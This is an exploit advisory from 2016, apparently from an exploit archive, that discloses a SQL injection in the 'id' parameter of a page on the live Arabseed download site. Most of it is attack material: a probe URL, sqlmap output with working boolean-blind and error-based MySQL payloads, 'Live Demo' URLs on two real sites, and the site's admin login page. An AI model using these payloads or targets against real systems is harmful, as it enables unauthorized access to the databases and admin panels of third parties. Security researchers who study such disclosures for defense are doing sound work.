######################
# Exploit Title : Arabseed XCMS V1.0.9 SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Vendor Homepage : http://arabseed.com/
# Tested on: [ BACKBOX]
# MyBlog : http://xbadgirl21.blogspot.com/
# skype:xbadgirl21
# Date: 07/09/2016
# video Proof : https://youtu.be/ABNSN3XecHw
######################
# [a] DESCRIPTION :
######################
# [+] Arabseed is an Download Website | Movies,Tv show,Songs And Forums .
# [+] Arabseed is an Famous Webiste in Arabic Country's
# [+] AND an SQL injection has been Detected in his subdomain :
wn.arabseed.com
######################
# [a] Poc :
######################
# When You want to Download Any Thing From the Website You Will Notice a
Redirection to the
# Subdomain : http://wn.arabseed.com/m1.php?id=[SQLi]
# [id] Get Parameter Vulnerable To SQLi
# http://wn.arabseed.com/m1.php?id=2358249'
######################
# [a] SQLmap PoC:
######################
# GET parameter 'id' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] N
# sqlmap identified the following injection point(s) with a total of 72
HTTP(s) requests:
# ---
#Parameter: id (GET)
#    Type: boolean-based blind
#    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
#    Payload: id=(SELECT (CASE WHEN (4787=4787) THEN 4787 ELSE 4787*(SELECT
4787 FROM
#    INFORMATION_SCHEMA.CHARACTER_SETS) END))
#
#    Type: error-based
#    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
#    Payload: id=2358249 AND (SELECT 4091 FROM(SELECT
COUNT(*),CONCAT(0x71767a6b71,(SELECT (
#    ELT(4091=4091,1))),0x7162627171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
# ---
#
# ---
# GET parameter 'id' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]
######################
# [a] Live Demo :
######################
# http://wn.arabseed.com/m1.php?id=2358249
# http://wwenews.us/m1.php?id=298733
######################
# [a] Admin Dashboard :
######################
# http://www.arabseed.com/ar/user/auth/login.html
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################